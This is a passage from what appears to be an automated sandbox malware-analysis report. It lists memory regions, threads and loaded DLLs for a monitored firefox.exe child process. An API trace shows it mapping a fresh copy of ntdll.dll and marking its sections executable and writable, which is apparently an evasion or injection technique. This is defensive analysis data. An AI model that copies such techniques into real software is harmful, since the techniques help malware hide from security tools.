"\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1678 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1679 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1680 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1681 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1682 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1683 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1684 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1685 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 1686 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 1687 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1688 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1689 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 1690 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1691 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1692 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1693 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1694 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1695 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1696 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1697 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1698 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1699 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1700 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1701 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1702 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1703 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1704 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1705 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1706 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1707 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1708 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 103 os_tid = 0xc6c Thread: id = 104 os_tid = 0xc68 Thread: id = 105 os_tid = 0xb20 Thread: id = 106 os_tid = 0xa40 Thread: id = 107 os_tid = 0x9e0 Thread: id = 108 os_tid = 0x514 Thread: id = 109 os_tid = 0x6a4 Thread: id = 110 os_tid = 0xcc Thread: id = 111 os_tid = 0x454 Thread: id = 112 os_tid = 0x448 Thread: id = 113 os_tid = 0x3b8 Thread: id = 114 os_tid = 0x3b0 Thread: id = 115 os_tid = 0x3a0 Thread: id = 116 os_tid = 0x354 Thread: id = 117 os_tid = 0x350 Thread: id = 118 os_tid = 0x34c Thread: id = 119 os_tid = 0x2fc Thread: id = 120 os_tid = 0x2f8 Thread: id = 121 os_tid = 0x2ec Thread: id = 122 os_tid = 0x2e0 Thread: id = 123 os_tid = 0x2d4 Thread: id = 124 os_tid = 0x2cc Thread: id = 130 os_tid = 0xd08 Process: id = "11" image_name = "firefox.exe" filename = "c:\\program files\\mozilla firefox\\firefox.exe" page_root = "0x7f1e6420" os_pid = "0xce4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xbd4" cmd_line = "\"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1797 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1798 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1799 start_va = 0x40000 end_va = 0x42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1800 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1801 start_va = 0x1f0000 end_va = 0xbb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1802 start_va = 0xbc0000 end_va = 0xcc9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 1803 start_va = 0x1240000 end_va = 0x1283fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 1804 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1805 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1806 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1807 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1808 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1809 start_va = 0xdf0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1810 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1811 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1812 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1813 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1814 start_va = 0x72000000 end_va = 0x720bdfff entry_point = 0x72000000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcr100.dll") Region: id = 1815 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1816 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1817 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1818 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1819 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1820 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1821 start_va = 0xcd0000 end_va = 0xd97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 1822 start_va = 0xdd0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 1823 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1824 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1825 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1826 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1827 start_va = 0xe30000 end_va = 0xf30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e30000" filename = "" Region: id = 1828 start_va = 0xf40000 end_va = 0x107bfff entry_point = 0xf40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1829 start_va = 0x1130000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 1830 start_va = 0x1290000 end_va = 0x1e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 1831 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1832 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1833 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1834 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1835 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1836 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1837 start_va = 0x62940000 end_va = 0x62af4fff entry_point = 0x62940000 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll") Region: id = 1838 start_va = 0x6e510000 end_va = 0x6e541fff entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1839 start_va = 0x720d0000 end_va = 0x72138fff entry_point = 0x720d0000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcp100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcp100.dll") Region: id = 1840 start_va = 0x72140000 end_va = 0x72161fff entry_point = 0x72140000 region_type = mapped_file name = "mozglue.dll" filename = "\\Program Files\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files\\mozilla firefox\\mozglue.dll") Region: id = 1841 start_va = 0x72170000 end_va = 0x72176fff entry_point = 0x72170000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll") Region: id = 1842 start_va = 0x1140000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 1843 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1844 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1845 start_va = 0x1f00000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1846 start_va = 0x2000000 end_va = 0x22cefff entry_point = 0x2000000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1847 start_va = 0x6f1f0000 end_va = 0x6f216fff entry_point = 0x6f1f0000 region_type = mapped_file name = "softokn3.dll" filename = "\\Program Files\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files\\mozilla firefox\\softokn3.dll") Region: id = 1848 start_va = 0x71fe0000 end_va = 0x71ff6fff entry_point = 0x71fe0000 region_type = mapped_file name = "nssdbm3.dll" filename = "\\Program Files\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files\\mozilla firefox\\nssdbm3.dll") Region: id = 1849 start_va = 0xda0000 end_va = 0xda6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 1850 start_va = 0xdb0000 end_va = 0xdb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 1851 start_va = 0x22d0000 end_va = 0x26c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022d0000" filename = "" Region: id = 1852 start_va = 0x6f0f0000 end_va = 0x6f13efff entry_point = 0x6f0f0000 region_type = mapped_file name = "freebl3.dll" filename = "\\Program Files\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files\\mozilla firefox\\freebl3.dll") Region: id = 1853 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1854 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1855 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Thread: id = 129 os_tid = 0xce8 [0109.227] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1efdd4 | out: HeapArray=0x1efdd4*=0xdf0000) returned 0x4 [0109.232] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x1efae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.234] NtCreateFile (in: FileHandle=0x1efb00, DesiredAccess=0x1200a0, ObjectAttributes=0x1efac8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1efae8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1efb00*=0x30, IoStatusBlock=0x1efae8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0109.241] NtCreateSection (in: SectionHandle=0x1efa68, DesiredAccess=0xf, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x10, AllocationAttributes=0x1000000, FileHandle=0x30 | out: SectionHandle=0x1efa68*=0x34) returned 0x0 [0109.244] NtMapViewOfSection (in: SectionHandle=0x34, ProcessHandle=0xffffffff, BaseAddress=0x1efa64*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x1efa60*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x1efa64*=0xf40000, SectionOffset=0x0, ViewSize=0x1efa60*=0x13c000) returned 0x40000003 [0109.246] NtClose (Handle=0x30) returned 0x0 [0109.246] NtClose (Handle=0x34) returned 0x0 [0109.248] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb18*=0xf40000, NumberOfBytesToProtect=0x1efb28, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb18*=0xf40000, NumberOfBytesToProtect=0x1efb28, OldAccessProtection=0x1efb14*=0x2) returned 0x0 [0109.248] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0xf41000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0xf41000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x20) returned 0x0 [0109.250] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0x1016000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0x1016000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x20) returned 0x0 [0109.250] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0x1017000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0x1017000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x8) returned 0x0 [0109.250] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0x1020000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0x1020000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x2) returned 0x0 [0109.251] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0x1077000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0x1077000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x2) returned 0x0